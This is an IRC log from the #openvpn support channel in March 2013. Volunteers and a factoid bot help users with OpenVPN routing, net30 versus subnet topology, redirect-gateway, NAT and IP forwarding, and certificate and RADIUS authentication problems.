10:14 < teknoprep> 10.254.1.0/24 10.0.1.2 UGS 0 0 1500 ovpnc1
10:14 < teknoprep> problem is i can't ping anything on that network
10:14 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 240 seconds]
10:14 < teknoprep> from the 10.20.1.0/24 network... i can't ping anything on the 10.254.1.0/24 network... not even the openvpn server local IP
10:15 < teknoprep> i have an iroute command in the ccd... i have a route command at the server config that says push 10.254.1.0/24 to all the clients.. that seems to be working
10:15 < teknoprep> how do i check if the iroute command is actually working properly ?
10:16 < teknoprep> should my OpenVPN server be able to ping the IP address handed out to the OpenVPN client ?
10:16 < teknoprep> the network is 10.0.1.0/30... so i am assuming .0 network / .1 server / .2 client / .3 broadcast
10:17 < teknoprep> so should the OpenVPN server(10.0.1.1) be able to ping The Client (10.0.1.2)
10:28 -!- JSharpe_ [~JSharpe@46.165.210.17] has joined #openvpn
10:28 -!- JSharpe_ [~JSharpe@46.165.210.17] has quit [Read error: Connection reset by peer]
10:36 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving]
10:39 < teknoprep> ??
10:46 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 252 seconds]
10:48 < jzaw> teknoprep, yes
10:48 < teknoprep> i can't
10:48 < jzaw> what do your networks look like?
10:49 < jzaw> 192.x.x.x. - tun 10.0.1.1 - 10.0.1.2 - 192.y.y.y ?
10:52 < teknoprep> one sec let me bring back up the tunnels
10:52 < teknoprep> so this is how it looks
10:52 < teknoprep> (Client1)192.168.1.0/24 - tun 10.0.1.2 - 10.0.1.1 - 10.254.1.0/24(Server in AWS)
11:23 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection]
11:24 -!- bkrieg1337 [~bkrieg133@120.28.171.16] has joined #openvpn
11:24 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
11:24 < bkrieg1337> hello
11:24 < bkrieg1337> is it necessary to always .var, .clean-all
11:25 < bkrieg1337> when creating for additional clients
11:25 < bkrieg1337> will the previous be deleted by . clean-all?
11:25 < teknoprep> jzaw: should my client be able to ping 10.0.1.1 ?
11:26 < teknoprep> jzaw: and should the server be able to ping 10.0.1.2 ?
11:26 < teknoprep> i can ping 10.0.1.1 from my client side
11:27 < teknoprep> but the ping time is .184ms... it must be local the 10.0.1.1 address
11:28 < pekster> bkrieg1337: In Easy-RSA 2.x you need to source vars any time you're in a new terminal or environment before you perform PKI tasks. You should never run clean-all unless you want to remove all your PKI files and start completely over (new CA, etc)
11:28 < bkrieg1337> thank you
11:33 < teknoprep> 10.254.1.0/24 10.0.1.6 UGS 0 2 1500 ovpnc1
11:33 < teknoprep> that is my new route... i made a few changes
11:33 < teknoprep> i can't ping that interface tho from the 192.168.1.0/24 network
11:33 < teknoprep> ip forwarding is enabled
11:34 < teknoprep> hell i can't ping that interface ip from the local box that is running OpenVPN
11:34 < pekster> teknoprep: What's your situation? LAN behind the server?
11:34 < teknoprep> 192.x.x.x. - tun 10.0.1.1 - 10.0.1.2 - 192.y.y.y ?
11:34 < teknoprep> sorry let me update
11:35 < teknoprep> (CLIENT)192.168.1.0/24 - tun 10.0.1.6 - 10.0.1.5 tun - 10.254.1.0/24(OpenVPN Server in AWS)
11:35 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 264 seconds]
11:35 < pekster> So you have LANs at both ends you're trying to route across the VPN for?
11:35 < teknoprep> everything is UP at this point for the VPN's
11:35 < teknoprep> yes
11:35 < teknoprep> now to get routes to push properly
11:35 < pekster> Pick one at a time to get working (one LAN to connect to the opposing peer's VPN IP)
11:36 < pekster> !serverlan
11:36 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png
11:36 < pekster> Then when the server-side LAN is working, see:
11:36 < pekster> !clientlan
11:36 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route
11:36 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png
11:36 < teknoprep> yes i already have all of that done
11:36 < teknoprep> ip-forwarding is enabled on both OpenVPN server/client
11:36 < teknoprep> no rules blocking traffic
11:37 < teknoprep> from the Client OpenVPN Client ... should i be able to ping the ip address 10.0.1.6 ?
11:37 < teknoprep> this is the IP address that is statically assigned from the OpenVPN server
11:38 < pekster> Nope, it's a virtual peering IP in /net30. You shouldn't use that unless you *actually* need to support 2.0.9 Windows clients that are over 6 years old
11:38 < pekster> !/30
11:38 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf
11:38 < teknoprep> gotcha
11:40 < jzaw> pekster, did you see .. i got that split routing working with proper returns of traffic initiated through the vpn
11:41 < jzaw> if you ping/trace fuji-pl.dzki.co.uk now on ipv4 it traces the route properly
11:41 < pekster> Policy routing does great things when properly set up
11:42 < jzaw> its all MARK and CONNMARK with rules and routes
11:43 < jzaw> kind of tidy really
11:43 < jzaw> very pleased it works
11:43 < pekster> Yup, that's the right way to do it
11:43 < jzaw> now i dont load the home internet connection unnecessarily
11:44 < teknoprep> pekster: jzaw: why would openvpn be setting my push "route 10.254.1.0 255.255.255.0" on my client box to do this... route 10.254.1.0/24 to 10.0.8.6 instead of 10.0.8.5 ?
11:45 < teknoprep> or is 10.0.8.6 used for routing on the OpenVPN client for the remote LAN
11:45 < teknoprep> pekster: with your comment on its a virtual peering IP /net30... i shouldn't use that
11:46 < teknoprep> pekster: i am at a loss with how routing is supposed to work then
11:46 < jzaw> you should get a lower ip at the server on the tunnel
11:46 < jzaw> and higher number at the client tunnel end
11:46 < teknoprep> i am getting a virtual address of 10.0.8.5 on both ends
11:47 < jzaw> pekster, ^^^ ?
11:47 < pekster> jzaw: Nope, other way around. The bot output said so just a page earlier
11:47 < pekster> teknoprep: Just use --topology subnet. You've been given that information at least twice now
11:48 < pekster> net30 is a stupid hack for old Windows systems so they could have cool things that Unix could do anyway
11:48 < teknoprep> ok... so now i need to start over
11:48 < teknoprep> and not use net 30
11:48 < pekster> Just add topology subnet
11:48 < pekster> That's it. No starting over
11:48 < pekster> Better yet,
11:49 < pekster> !configs
11:49 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config
11:49 -!- Volkswagner [~eric@cpe-24-161-55-139.hvc.res.rr.com] has quit [Ping timeout: 255 seconds]
11:49 < pekster> I mean, you can leave net30 if you want, but since you're apparently confused about how it works, now's as good a time as any to fix it
11:50 < teknoprep> not really confused on how it works
11:50 < teknoprep> it makes sense
11:50 < teknoprep> server gets 10.0.8.5
11:50 < pekster> No!
11:50 < teknoprep> client gets 10.0.8.6
11:50 < pekster> :(
11:50 < pekster> Nope
11:50 < teknoprep> ?
11:50 < teknoprep> then how the hell do i get different IP's on the server than the client ?
11:50 < teknoprep> so i can have routing between them
11:50 -!- gladiatr [~usualfrog@openvpn/community/support/gladiatr] has left #openvpn ["Leaving"]
11:50 < pekster> It creates a virtual /30
11:51 < teknoprep> i was assuming that this /30 was similar to an INET /30 where then you can route larger blocks of IP's to an ip inside of that /30
11:51 < pekster> The server assigns itself the first block, at 10.0.8.0/30. The server then assigns the client 10.0.8.4/30, out of which it creates a "subnet" where it peers between .6/32 and .5/32
11:52 < pekster> The "server" is not at .5. It's still at .1.
11:52 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has joined #openvpn
11:52 < pekster> .5 is a virtual address, not used by anything except as a PtP target
11:52 < teknoprep> ahhh
11:52 < pekster> And that, is why net30 is stupid
11:52 < pekster> It's completely unnecessary, even if you need to support Windows clients. And that was the only reason to ever use it before anyway
11:52 < teknoprep> i should be able to ping 10.0.8.1 correct ?
11:52 < pekster> Right
11:52 < teknoprep> why would its ping time be less than 1ms ?
11:53 < teknoprep> when its 100 miles away
11:53 < teknoprep> seems like the local client is answering for this
11:53 < pekster> Post some configs
11:53 < teknoprep> ahh nvm
11:53 < teknoprep> its not answering
11:53 < teknoprep> i understand what its doing now.. so i can debug from here
11:57 < teknoprep> so the Client should get the 10.0.8.6 ip address correct ?
11:58 < teknoprep> i should be able to ping that from the client side LAN
11:58 < teknoprep> if everything is configured properly... or is that also wrong
12:00 < pekster> Firewall and routes permitting
12:01 < teknoprep> ahh nice
12:01 < teknoprep> so i think i got it then
12:04 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
12:08 < Keshl> So, I was in here a few days ago asking for help setting up VPN. It works now, I can get into my network away from home and interact with its systems as if I was home. However, I cannot access the Internet through the VPN connection. After Googling around I think I have a general idea of what needs to be done, but it's so over my head that I can't even summarize it here. Are there any guides out there that don't assume any knowledge of
12:08 < Keshl> iptables and stuff that can walk me through this?
12:09 < pekster> !redirect
12:09 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
12:09 <@vpnHelper> http://ircpimps.org/redirect.png
12:09 < Keshl> Woo OωO!
12:10 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 258 seconds]
12:10 < Keshl> !def1
12:10 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1"
12:10 < Keshl> >w> Wish I could query this rather than spamming the channel.
12:11 < pekster> You can, but TBH it's more convenient to do it here as the /msg commands are longer and require the channel name
12:11 < Keshl> Ohhh oωo
12:11 < pekster> It's a slow day, and it's not spam since it's on-topic ;)
12:11 < Keshl> Still. all of /that/ was over my head, too. <.<
12:11 < Keshl> So how does I make it do magical quety stuff, oωo?
12:12 < Keshl> *query
12:12 < pekster> 'factoids whatis #openvpn thing' in a privmsg. See also 'help' and 'factoids help'
12:13 -!- civillian [~nick@174.202.49.122-static.velocitynet.com.au] has quit [Ping timeout: 256 seconds]
12:13 < Keshl> oωo.
12:13 < Keshl> ...Nope. x.x
12:14 * Keshl types "man openvpn".. Then proceeds to curl up and slowly die.
12:16 -!- bkrieg1337 [~bkrieg133@120.28.171.16] has quit [Quit: Leaving]
12:16 < Keshl> Okay, let's see what happens if I just guess randomly and see if I get lucky. Maybe it'll work. <.<
12:16 < Keshl> !ipforward
12:16 < Keshl> !nat
12:16 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall
12:16 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto
12:17 -!- Cubox [cubox@unaffiliated/cubox] has left #openvpn ["WeeChat 0.4.0"]
12:17 < Keshl> !linipforward
12:17 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT
12:17 < pekster> Guess randomly? You have a complete flowchart and all sorts of helper output. Ask if you get stuck, but it's wise to check the bot's messages carefully and read the manpage for the directives it's telling you about first
12:18 < Keshl> pekster: I know what I meant to say but I don't think I said it right. <.< I'll be fine. Probably. The manual page is big and scary and I spaz sometimes. o_o
12:18 < pekster> The find feature helps
12:19 < Keshl> Indeedily so. Still. Tiiiiiny little scrollbar .ω.
12:19 < Keshl> And then there's the fact that, even though the router's running Linux, I have to use a GUI to change most stuff or it won't commit it to NVRAM <.<
12:20 -!- civillian [~nick@174.202.49.122-static.velocitynet.com.au] has joined #openvpn
12:20 < pekster> OpenWRT? You can edit the /config/ directory without a GUI; I build my own firmware without one
12:20 < Keshl> DD-WRT, not OpenWRT.
12:20 < Keshl> Similar name, different things.
12:20 < pekster> They're still using nvram? :(
12:20 < Keshl> Si, oωo.
12:20 < Keshl> From what I can tell development's stalled, too. <ω<
12:20 < Keshl> Last release was in 2-11.
12:20 < Keshl> *2011
12:20 -!- penk [~dave@216.142.113.233] has quit [Quit: Leaving...]
12:22 < Keshl> ....Okay from what I can gather, ip forwarding isn't enabled, but I can't do any of that since it'll lose it whenever it loses power.. Now I have to try to figure out what the GUI calls it. <.<
12:25 < Keshl> ... Or I can read my config and see that I don't have redirect-gateway enabled. <.< Do I basically just stick "redirect-gateway def1" in it somewhere? Or am I headed in the wrong direction?
12:26 < pekster> That would be the 2nd box on the flowchart
12:27 < Keshl> Yes, oωo. But do I have the name of the command right?
12:27 < Keshl> Er, the entire line, I mean.
12:27 < Keshl> When I see "def1" I feel like I need to define it somewhere, and I know I haven't. But now I kinda feel like maybe like.. Blah mindfart x.x
12:28 < pekster> It's an optional parameter to --redirect-gateway. The manpage has full details
12:29 < Keshl> But why do people keep putting -- before them? In the config they don't have them. xwx
12:29 < pekster> !--
12:29 <@vpnHelper> "--" is OpenVPN allows any option to be placed either on the command line or in a configuration file. Though all command line options are preceded by a double-leading-dash ("--"), this prefix is usually omitted when an option is placed in a configuration file.
12:30 < Keshl> Ohhhhh.. Kaithanks -ω-
12:30 < pekster> Also, your random characters after comments don't provide useful info and are not fun to parse
12:31 < pekster> protip: searching in the manpage for --option is more likely to quickly get you to the directive you're interested in
12:32 < Keshl> And it has.
12:32 < Keshl> Okay.. I have no idea where this would be in the GUI, so I'm gunna hope this just works. <ω< Gotta wait till later to try it from an external network though.. Thanks for the help.
12:46 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
12:46 -!- mode/#openvpn [+o krzee] by ChanServ
12:51 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
13:22 -!- mirco [~mirco@ip-95-222-244-247.unitymediagroup.de] has joined #openvpn
13:25 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has quit [Quit: Konversation terminated!]
13:28 -!- brute11k [~brute@89.249.230.134] has quit [Ping timeout: 260 seconds]
13:29 -!- brute11k [~brute@89.249.230.134] has joined #openvpn
13:33 -!- mirco [~mirco@ip-95-222-244-247.unitymediagroup.de] has quit [Quit: mirco]
13:45 -!- jasonsmr [~Administr@c-68-61-42-207.hsd1.mi.comcast.net] has joined #openvpn
13:45 < jasonsmr> hello openvpn channel
13:46 < jasonsmr> Question I am working with a server client configuration and for some reason my client is not auto configuring the tun adapter?
13:50 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 255 seconds]
13:53 -!- penk [~dave@216.142.113.81] has joined #openvpn
13:53 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
13:55 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
14:02 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 255 seconds]
14:05 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
14:05 -!- penk [~dave@216.142.113.81] has quit [Quit: Leaving...]
14:11 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 257 seconds] 14:14 < jzaw> jasonsmr, what system ... os ... is some other script taking over ? etc etc 14:15 < jzaw> paste your server and client confs 14:24 -!- tyteen4a03 [tyteen4a03@69.50.229.69] has quit [Quit: Hurr Durr!] 14:27 < jasonsmr> its CentOS 6.3 14:27 < jasonsmr> just a sec ill pastebin 14:29 -!- tyteen4a03 [tyteen4a03@ec2-54-225-157-7.compute-1.amazonaws.com] has joined #openvpn 14:31 -!- MeanderingCode_ [~Meanderin@71-213-190-2.albq.qwest.net] has quit [Ping timeout: 252 seconds] 14:32 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 14:37 < jasonsmr> heres the client side configuration >> http://sprunge.us/EGLH 14:37 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:37 < jasonsmr> and heres the server side configuration >> http://sprunge.us/bWNO 14:39 < jasonsmr> the thing is I am trying this in a EC2 VM so I have a public accessable address that I can point a client to for accessing the server, but from the servers point of view thats a non existant or inaccessable address (the server can not ping itself) 14:44 < pekster> jasonsmr: Your server specifies --client-cert-not-required yet your client config attempts to use certs instead of --auth-user-pass 14:45 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 14:45 < jasonsmr> I definatly want it to use certs if possable, but was also using radius server, are both used required? 14:46 < jasonsmr> I got lost 14:46 < pekster> See --client-cert-not-required in the manpage. You're telling it that clients do not need to providei them 14:46 < jasonsmr> allright ill remove this from the server.conf 14:47 < pekster> Clients still need --auth-user-pass to even pass in the un/pw. 
Further, the 'reneg-sec 0' setting in your server is also worthless since the client will renegotiate after 3600 seconds anyway as the client-side default 14:47 < pekster> (and you're sacrificing perfefct forward secrecy by doing that anyway, for not any tangible benefit either) 14:48 < jasonsmr> thanks for helping me clean it up 14:58 -!- Rough_ [Ah2k@114.31.8.194] has joined #openvpn 15:04 -!- MeanderingCode [~Meanderin@71-213-190-2.albq.qwest.net] has joined #openvpn 15:12 -!- teknoprep [~quassel@unaffiliated/teknoprep] has quit [Read error: Connection reset by peer] 15:18 -!- VisionNL [~anonymous@tuig.nikhef.nl] has joined #openvpn 15:20 < VisionNL> question: why is OpenVPN so strict with the certificate flags for TLS Client and TLS Server 15:21 < VisionNL> I noticed that setting both the TLS Client and TLS Server on my client or server certificates resulted in a TLS handshake failure. Which sounds a bit pedantic. Is there a motivation for it? 15:25 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 15:49 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Quit: This computer has gone to sleep] 15:51 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has quit [Quit: Coyote finally caught me] 15:51 -!- zhvtar [~zhvtar@198.23.139.102] has joined #openvpn 15:51 -!- zhvtar [~zhvtar@198.23.139.102] has quit [Changing host] 15:51 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has joined #openvpn 16:04 < jasonsmr> hello again I am still having problems with authorization on my vpn server it says that it fails at tls auth 16:04 < jasonsmr> heres a pastebin of my log >> http://sprunge.us/KNfQ 16:06 < jasonsmr> and in turn here is my server.conf file for openvpn >> 8 16:06 < jasonsmr> http://sprunge.us/dSTQ 16:06 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 16:07 < jasonsmr> and my client config >> http://sprunge.us/TLjF 16:12 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 258 seconds] 16:17 
-!- master_of_master [~master_of@p4FF247F7.dip.t-dialin.net] has joined #openvpn 16:20 -!- master_o1_master [~master_of@p4FF244B8.dip.t-dialin.net] has quit [Ping timeout: 256 seconds] 16:28 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:38 < jpalmer> jasonsmr: check the time on both servers. make sure it's right (use ntpdate) 16:39 < jpalmer> jasonsmr: nevermind, I was looking at a different paste. the time thing is unrelated 16:43 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 16:43 -!- mode/#openvpn [+o krzee] by ChanServ 16:44 -!- JSharpe [~JSharpe@46.165.210.17] has quit [Ping timeout: 260 seconds] 16:45 -!- MeanderingCode_ [~Meanderin@71-213-190-2.albq.qwest.net] has joined #openvpn 16:46 -!- brute11k [~brute@89.249.230.134] has quit [Ping timeout: 260 seconds] 16:46 -!- MeanderingCode [~Meanderin@71-213-190-2.albq.qwest.net] has quit [Ping timeout: 276 seconds] 16:47 -!- brute11k [~brute@89.249.230.134] has joined #openvpn 16:53 -!- penk [~dave@pool-100-0-131-24.bstnma.east.verizon.net] has joined #openvpn 16:55 -!- JSharpe [~JSharpe@46.165.210.17] has joined #openvpn 16:56 -!- p3rror [~mezgani@196.201.78.139] has joined #openvpn 16:58 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 17:06 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 17:11 < civillian> jasonsmr: looks like radius auth failed: PLUGIN_CALL: POST /etc/openvpn/radiusplugin.so/PLUGIN_AUTH_USER_PASS_VERIFY status=1 17:11 < civillian> status should be 0 for pass I believe 17:14 -!- mattock_afk [~mattock@openvpn/corp/admin/mattock] has quit [Ping timeout: 264 seconds] 17:15 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 272 seconds] 17:16 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 17:18 -!- mattock_afk [~mattock@raidz.im] has joined #openvpn 17:18 -!- mattock_afk is now known as mattock 17:18 -!- mattock [~mattock@raidz.im] has quit [Changing host] 17:18 -!- mattock 
[~mattock@openvpn/corp/admin/mattock] has joined #openvpn 17:18 -!- mode/#openvpn [+o mattock] by ChanServ 17:19 < jasonsmr> I tried creating a user fothanks 17:19 < jasonsmr> thanks Ill look at it 17:21 -!- maetrik [maetrik@185.14.184.81] has joined #openvpn 17:26 -!- penk [~dave@pool-100-0-131-24.bstnma.east.verizon.net] has quit [Quit: Leaving...] 17:29 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Ping timeout: 260 seconds] 17:29 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 17:30 -!- mattock [~mattock@openvpn/corp/admin/mattock] has quit [Ping timeout: 256 seconds] 17:30 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Quit: This computer has gone to sleep] 17:30 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 17:32 -!- mattock_afk [~mattock@raidz.im] has joined #openvpn 17:32 -!- jarray52 [~bigbear@unaffiliated/jarray52] has joined #openvpn 17:33 -!- jtrucks is now known as troll 17:33 -!- troll is now known as jtrucks 17:36 -!- mattock_afk [~mattock@raidz.im] has quit [Ping timeout: 245 seconds] 17:38 -!- raidz_away [~raidz@openvpn/corp/admin/andrew] has quit [Ping timeout: 260 seconds] 17:41 -!- novaflash is now known as novaflash_away 17:42 -!- mattock_afk [~mattock@raidz.im] has joined #openvpn 17:42 -!- raidz_away [~raidz@46.28.203.186] has joined #openvpn 17:42 -!- raidz_away is now known as raidz 17:42 -!- raidz [~raidz@46.28.203.186] has quit [Changing host] 17:42 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 17:43 -!- mode/#openvpn [+o raidz] by ChanServ 17:43 -!- mattock_afk is now known as mattock 17:43 -!- mattock [~mattock@raidz.im] has quit [Changing host] 17:43 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 17:43 -!- mode/#openvpn [+o mattock] by ChanServ 17:44 -!- Orbi [~opera@anon-186-55.vpn.ipredator.se] has left #openvpn [] 17:47 -!- JSharpe_ [~JSharpe@5.69.13.182] has joined #openvpn 17:49 
-!- JSharpe [~JSharpe@46.165.210.17] has quit [Ping timeout: 256 seconds]
17:49 -!- penk [~dave@pool-100-0-131-24.bstnma.east.verizon.net] has joined #openvpn
17:51 -!- novaflash_away is now known as novaflash
17:53 < jasonsmr> Okay, this is strange: in an effort to just test to see if everything else is all right I used an authorization method secrets = file instead of server crt and client crt files
17:55 < jasonsmr> well after this change in the server and client config files I found that my client machine would freeze up and needed to be restarted, note that this is an EC2 instance and it could just be that the networking is gone... either way it's not allowing public access to my public net and vpn ??
17:56 -!- p3rror [~mezgani@196.201.78.139] has quit [Quit: Leaving]
18:01 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds]
18:02 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn []
18:07 -!- nsx [~ns@87-57-145-221-dynamic.dk.customer.tdc.net] has joined #openvpn
--- Log closed Sun Mar 24 18:10:21 2013
--- Log opened Sun Mar 24 18:15:43 2013
18:15 -!- ecrist_ [~ecrist@token-black.secure-computing.net] has joined #openvpn
18:15 -!- Irssi: #openvpn: Total of 178 nicks [6 ops, 0 halfops, 1 voices, 171 normal]
18:15 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-vqvgtzvvbbbougmj] has quit [Ping timeout: 245 seconds]
18:15 -!- VisionNL_ [~anonymous@tuig.nikhef.nl] has joined #openvpn
18:16 -!- Irssi: Join to #openvpn was synced in 40 secs
18:16 -!- rheddry [~levifig@spwn.co] has joined #openvpn
18:16 -!- GabrieleV_ [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn
18:16 -!- Pei_ [~pei@thinks.outside.theb0x.org] has joined #openvpn
18:16 -!- KiNgMaR [~ingmar@2a00:1828:2000:289::cafe:d00d] has joined #openvpn
18:17 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds]
18:17 -!- _matt [~matt@mlpc.wiltshire.ac.uk] has joined #openvpn
18:17 -!- soapee01_
[~soapee01@24-155-219-177.dyn.grandenetworks.net] has joined #openvpn 18:18 -!- JSharpe__ [~JSharpe@5.69.13.182] has joined #openvpn 18:18 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Ping timeout: 258 seconds] 18:18 -!- _matt is now known as Guest42485 18:18 -!- nonotza_ [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has joined #openvpn 18:18 -!- havoc_ [~havoc@208.87.120.111] has joined #openvpn 18:19 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 256 seconds] 18:20 -!- Netsplit *.net <-> *.split quits: kloeri, Wintereise, JStoker, zu_, GabrieleV, folivora, pulz, matt_, @ecrist, VisionNL, (+1 more, use /NETSPLIT to show all of them) 18:20 -!- piele [~Unknown@bakzeil.creativeserver.net] has joined #openvpn 18:20 -!- jasonsmr [~Administr@c-68-61-42-207.hsd1.mi.comcast.net] has joined #openvpn 18:21 -!- kloeri_ is now known as kloeri 18:21 -!- JSharpe_ [~JSharpe@5.69.13.182] has quit [Ping timeout: 264 seconds] 18:22 -!- krphop_ [~krphop@watch.out.the.feds.are.rightbehind.us] has joined #openvpn 18:22 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 18:22 -!- tyteen4a03 [tyteen4a03@us2.freeBNC.net] has joined #openvpn 18:23 -!- soapee01 [~soapee01@24-155-219-177.dyn.grandenetworks.net] has quit [Ping timeout: 245 seconds] 18:23 -!- Pei [~pei@thinks.outside.theb0x.org] has quit [Ping timeout: 248 seconds] 18:23 -!- sitaktif [~sitaktif@kollok.org] has quit [Ping timeout: 248 seconds] 18:23 -!- kmmndr [~tomtom@bro67-2-82-227-110-8.fbx.proxad.net] has quit [Ping timeout: 248 seconds] 18:23 -!- krphop [~krphop@watch.out.the.feds.are.rightbehind.us] has quit [Ping timeout: 248 seconds] 18:23 -!- havoc [~havoc@neptune.chaillet.net] has quit [Ping timeout: 248 seconds] 18:23 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has quit [Ping timeout: 248 seconds] 18:23 -!- nonotza_ is now known as nonotza 18:24 -!- Netsplit *.net <-> *.split quits: Scrumps, Ancient 18:24 -!- Netsplit *.net <-> 
*.split quits: Valcorb
18:24 -!- sitaktif1 [~sitaktif@kollok.org] has joined #openvpn
18:25 -!- Scrumps [~asdfgjkl@cpe-173-095-129-006.nc.res.rr.com] has joined #openvpn
18:28 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
18:28 -!- Wintereise [~reise@205.185.126.190] has joined #openvpn
18:29 -!- Ancient [~ancient@us.whatbox.ca] has joined #openvpn
18:29 -!- Wintereise [~reise@205.185.126.190] has quit [Changing host]
18:29 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn
18:30 < jasonsmr> So any help? I have openvpn connecting now using the secrets option in the server / client conf files accordingly but there's a problem that it severs my public network connection at the same time it connects the VPN
18:31 < jasonsmr> any help with keeping the public connection active is greatly appreciated
18:33 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has quit []
